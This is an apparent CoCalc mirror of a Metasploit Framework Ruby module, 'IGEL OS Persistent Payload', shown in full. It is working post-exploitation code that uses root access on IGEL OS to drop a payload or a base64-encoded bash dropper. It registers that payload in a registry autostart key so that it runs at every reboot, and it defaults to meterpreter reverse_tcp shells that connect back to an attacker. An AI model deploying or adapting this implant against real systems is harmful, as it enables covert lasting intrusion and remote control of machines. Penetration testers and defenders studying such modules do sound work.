Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/persistence/igel_persistence.rb
31425 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  include Msf::Post::Linux

8
  include Msf::Post::Linux::System

9
  include Msf::Post::Unix

10
  include Msf::Post::File

11
  include Msf::Exploit::FileDropper

12
  include Msf::Exploit::EXE

13
  include Msf::Exploit::Local::Persistence

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'IGEL OS Persistent Payload',

20
        'Description' => %q{

21
          Gain persistence for specified payload on IGEL OS Workspace Edition, by writing

22
          a payload to disk or base64-encoding and executing from registry.

23
        },

24
        'Author' => 'Zack Didcott',

25
        'License' => MSF_LICENSE,

26
        'Platform' => ['linux'],

27
        'Targets' => [

28
          [

29
            'Linux Command', {

30
              'Arch' => [ARCH_CMD],

31
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/https/x64/meterpreter/reverse_tcp' },

32
              'Type' => :nix_cmd

33
            }

34
          ],

35
          [

36
            'Linux Dropper', {

37
              'Arch' => [ARCH_X64],

38
              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },

39
              'Type' => :linux_dropper

40
            }

41
          ],

42
        ],

43
        'DefaultTarget' => 0,

44
        'SessionTypes' => ['shell', 'meterpreter'],

45
        'DisclosureDate' => '2016-11-02', # IGEL OS 10 release date

46
        'Notes' => {

47
          'Stability' => [CRASH_SAFE],

48
          'Reliability' => [REPEATABLE_SESSION],

49
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]

50
        }

51
      )

52
    )

53


54
    register_options([

55
      OptString.new('REGISTRY_KEY', [

56
        true,

57
        'Registry key to use for automatically executing payload',

58
        'userinterface.rccustom.custom_cmd_net_final'

59
      ]),

60
      OptString.new('TARGET_DIR', [true, 'Directory to write payload (dropper only)', '/license']),

61
      OptBool.new('REGISTRY_ONLY', [true, 'Set whether to store payload in registry (dropper only)', false])

62
    ])

63
  end

64


65
  def validate

66
    unless is_root?

67
      fail_with(Failure::NoAccess, 'Session does not have root access')

68
    end

69
  end

70


71
  def install_persistence

72
    validate

73


74
    case target['Type']

75
    when :nix_cmd

76
      command = payload.encoded

77
    when :linux_dropper

78
      if datastore['REGISTRY_ONLY']

79
        print_status('Base64-encoding payload')

80
        encoded_payload = Rex::Text.encode_base64(generate_payload_exe)

81
        command = base64_command(encoded_payload)

82
      else

83
        print_status("Uploading payload to #{datastore['TARGET_DIR']}")

84
        payload_file = write_payload(generate_payload_exe, datastore['TARGET_DIR'], 0o700)

85
        command = local_command(payload_file)

86
      end

87
    end

88


89
    print_status('Writing persistence to registry')

90
    write_registry(datastore['REGISTRY_KEY'], command)

91
    if get_registry(datastore['REGISTRY_KEY']) != command

92
      fail_with(Failure::Unknown, 'Failed to write to registry')

93
    else

94
      print_status('Registry written successfully')

95
      print_status('The payload should be executed when the target reboots')

96
    end

97
  end

98


99
  def remount_license(opt = 'rw')

100
    create_process('/bin/mount', args: ['-o', "remount,#{opt}", '/license'])

101
  end

102


103
  def write_payload(contents, dir, perm)

104
    remount_license('rw')

105


106
    filepath = "#{dir}/#{Rex::Text.rand_text_alpha(8)}"

107
    write_file(filepath, contents)

108
    chmod(filepath, perm)

109


110
    remount_license('ro')

111


112
    return filepath

113
  end

114


115
  def base64_command(encoded_payload)

116
    payload_dest = "/tmp/#{Rex::Text.rand_text_alpha(8)}"

117
    "/bin/bash -c '/bin/echo '#{encoded_payload}' | /usr/bin/base64 -d > '#{payload_dest}'; /bin/chmod +x '#{payload_dest}'; '#{payload_dest}' &'"

118
  end

119


120
  def local_command(payload_file)

121
    command = "/bin/bash -c '/bin/mount -o remount,exec /license; '#{payload_file}' &'"

122
    return command

123
  end

124


125
  def get_registry(key)

126
    create_process('/bin/get', args: [key])

127
  end

128


129
  def write_registry(key, value)

130
    create_process('/bin/setparam', args: [key, value])

131
  end

132
end

133


134